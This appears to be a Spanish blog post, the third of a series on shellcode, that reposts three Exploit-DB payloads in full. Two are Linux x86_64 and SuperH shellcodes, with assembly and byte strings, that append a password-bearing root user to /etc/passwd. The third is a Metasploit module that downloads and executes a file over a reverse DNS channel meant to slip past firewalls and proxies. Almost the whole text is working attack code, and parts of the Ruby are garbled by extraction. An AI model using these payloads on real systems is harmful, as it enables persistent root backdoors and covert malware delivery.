Shellcodes (Parte III de III)

Último artículo de Shellcodes, disfrutarlo! :D

http://www.exploit-db.com/exploits/18585/

Linux x86_64 - add user with passwd (189 bytes);sc_adduser01.S;Arch: x86_64, Linux;;Author: 0_o -- null_null; nu11.nu11 [at] yahoo.com;Date: 2012-03-05;;compile an executable: nasm -f elf64 sc_adduser.S; ld -o sc_adduser sc_adduser.o;compile an object: nasm -o sc_adduser_obj sc_adduser.S;;Purpose: adds user "t0r" with password "Winner" to /etc/passwd;executed syscalls: setreuid, setregid, open, write, close, exit;Result: t0r:3UgT5tXKUkUFg:0:0::/root:/bin/bash;syscall op codes: /usr/include/x86_64-linux-gnu/asm/unistd_64.hBITS 64[SECTION .text]global _start_start:;sys_setreuid(uint ruid, uint euid)xor rax, raxmov al, 113 ;syscall sys_setreuidxor rbx, rbx ;arg 1 -- set real uid to rootmov rcx, rbx ;arg 2 -- set effective uid to rootsyscall;sys_setregid(uint rgid, uint egid)xor rax, raxmov al, 114 ;syscall sys_setregidxor rbx, rbx ;arg 1 -- set real uid to rootmov rcx, rbx ;arg 2 -- set effective uid to rootsyscall;push all strings on the stack prior to file operations.xor rbx, rbxmov ebx, 0x647773FFshr rbx, 8push rbx ;string \00dwsmov rbx, 0x7361702f6374652fpush rbx ;string sap/cte/mov rbx, 0x0A687361622F6EFFshr rbx, 8push rbx ;string \00\nhsab/nmov rbx, 0x69622F3A746F6F72push rbx ;string ib/:toormov rbx, 0x2F3A3A303A303A67push rbx ;string /::0:0:gmov rbx, 0x46556B554B587435push rbx ;string FUkUKXt5mov rbx, 0x546755333A723074push rbx ;string TgU3:r0t;prelude to doing anything useful...mov rbx, rsp ;save stack pointer for later usepush rbp ;store base pointer to stack so it can be restored latermov rbp, rsp ;set base pointer to current stack pointer;sys_open(char* fname, int flags, int mode)sub rsp, 16mov [rbp - 16], rbx ;store pointer to "t0r..../bash"mov si, 0x0401 ;arg 2 -- flagsmov rdi, rbxadd rdi, 40 ;arg 1 -- pointer to "/etc/passwd"xor rax, raxmov al, 2 ;syscall sys_opensyscall;sys_write(uint fd, char* buf, uint size)mov [rbp - 4], eax ;arg 1 -- fd is retval of sys_open. save fd to stack for later use.mov rcx, rbx ;arg 2 -- load rcx with pointer to string "t0r.../bash"xor rdx, rdxmov dl, 39 ;arg 3 -- load rdx with size of string "t0r.../bash\00"mov rsi, rcx ;arg 2 -- move to source index registermov rdi, rax ;arg 1 -- move to destination index registerxor rax, raxmov al, 1 ;syscall sys_writesyscall;sys_close(uint fd)xor rdi, rdimov edi, [rbp - 4] ;arg 1 -- load stored file descriptor to destination index registerxor rax, raxmov al, 3 ;syscall sys_closesyscall;sys_exit(int err_code)xor rax, raxmov al, 60 ;syscall sys_exitxor rbx, rbx ;arg 1 -- error codesyscall;char shellcode[] =; "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31"; "\xc0\xb0\x72\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31\xdb\xbb"; "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63"; "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a"; "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69"; "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35"; "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33"; "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10"; "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28"; "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31"; "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f"; "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48"; "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";;;equivalent code:;;char shellcode[] =; "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31"; "\xc0\xb0\x72\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31\xdb\xbb"; "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63"; "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a"; "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69"; "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35"; "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33"; "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10"; "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28"; "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31"; "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f"; "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48"; "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";-------------------------------------------------------------------------------------http://www.exploit-db.com/exploits/17439/SuperH (sh4) Add root user with password/*** Title: Linux/SuperH - sh4 - add root user with password - 143 bytes** Date: 2011-06-23** Tested on: debian-sh4 2.6.32-5-sh7751r** Author: Jonathan Salwan - twitter: @jonathansalwan**** http://shell-storm.org**** Informations:** -------------** - user: shell-storm** - pswd: toor** - uid : 0**** open:** mov #5, r3** mova @(130, pc), r0** mov r0, r4** mov #255, r13** mov #4, r12** mul.l r13, r12** sts macl, r5** add #69, r5** mov #84, r13** mov #5, r12** mul.l r13, r12** sts macl, r6** trapa #2** mov r0, r11**** write:** xor r6, r6** xor r5, r5** mov #4, r3** mov r11, r4** mova @(20, pc), r0** mov r0, r5** mov #72, r6** trapa #2**** close:** mov #6, r3** mov r11, r4** trapa #2**** exit:** mov #1, r3** xor r4, r4** trapa #2** ** user:** .string "shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n"**** file:** .string "@@@/etc/passwd"****** The '@@@' is just for alignment.***/#include #include char *SC = /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */ "\x05\xe3\x20\xc7\x03\x64\xff\xed" "\x04\xec\xd7\x0c\x1a\x05\x45\x75" "\x54\xed\x05\xec\xd7\x0c\x1a\x06" "\x02\xc3" /* r11 = fd */ "\x03\x6b" /* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */ "\x6a\x26\x5a\x25\x04\xe3\xb3\x64" "\x04\xc7\x03\x65\x48\xe6\x02\xc3" /* close(fd) */ "\x06\xe3\xb3\x64\x02\xc3" /* exit(0) */ "\x01\xe3\x4a\x24\x02\xc3" /* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */ "\x73\x68\x65\x6c\x6c\x2d\x73\x74" "\x6f\x72\x6d\x3a\x24\x31\x24\x4b" "\x51\x59\x6c\x2f\x79\x72\x75\x24" "\x50\x4d\x74\x30\x32\x7a\x55\x54" "\x57\x6d\x4d\x76\x50\x57\x63\x55" "\x34\x6f\x51\x4c\x73\x2f\x3a\x30" "\x3a\x30\x3a\x72\x6f\x6f\x74\x3a" "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62" "\x69\x6e\x2f\x62\x61\x73\x68\x5c" "\x6e" /* @@@/etc/passwd */ "\x40\x40\x40\x2f\x65\x74\x63\x2f" "\x70\x61\x73\x73\x77\x64";int main(void){ fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)();return 0;}

-----------------------------------------------------------------------------------------------------------------------------http://www.exploit-db.com/exploits/17326/DNS Reverse Download and Exec Shellcode

# Shellcode: download and execute file via reverse DNS channel

# Features:

# * Windows 7 tested

# * UAC without work (svchost.exe makes requests via getaddrinfo)

# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)

# * NO SOCKET

# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip

# By Alexey Sintsov

# [DSecRG]

# a.sintsov [sobachka] dsecrg.com

# dookie [sobachka] inbox.ru

# P.S. Works with Vista/7/2008

# do not work in XP/2003 because thre are no IPv6 by default.

# can work in XP/2003 if IPv6 installed

# (it is not need to be enabled, just installed)

require 'msf/core'

module Metasploit3

include Msf::Payload::Windows

include Msf::Payload::Single

def initialize(info = {})

super(update_info(info,

'Name' => 'DNS_DOWNLOAD_EXEC',

'Version' => '0.01',

'Description' => 'Download and Exec (via DNS)',

'Author' => [ 'Alexey Sintsov' ],

'License' => MSF_LICENSE,

'Platform' => 'win',

'Arch' => ARCH_X86,

'Payload' =>

{

'Offsets' =>{ },

'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74

\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78

\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33

\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73

\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",

'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF

\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e

\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B

\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F

\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46

\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4

\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54

\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24

\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50

\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57

\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24

\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",

'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff

\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10

\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B

\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b

\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33

\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66

\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04

\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8

\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61

\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40

\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05

\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33

\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"

}

))

# We use rtlExitThread(0)

deregister_options('EXITFUNC')

# Register the domain and cmd options

register_options(

[

OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),

OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),

], self.class)

end

# Constructs the payload

def generate_stage

domain = datastore['DOMAIN'] || ''

extens = datastore['FILE'] || 'vbs'

# \"x66\x79\x66\x01"

extLen=extens.length

while extens.length<4 div="div">

extens=extens+"\x01"

end

i=0

while i

extens[i,1]=(extens[i].ord+1).chr

i=i+1

end

while domain.length<10 div="div">

domain=domain+"\xFF"

end

domain="\x2e"+domain

payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']

return payload

end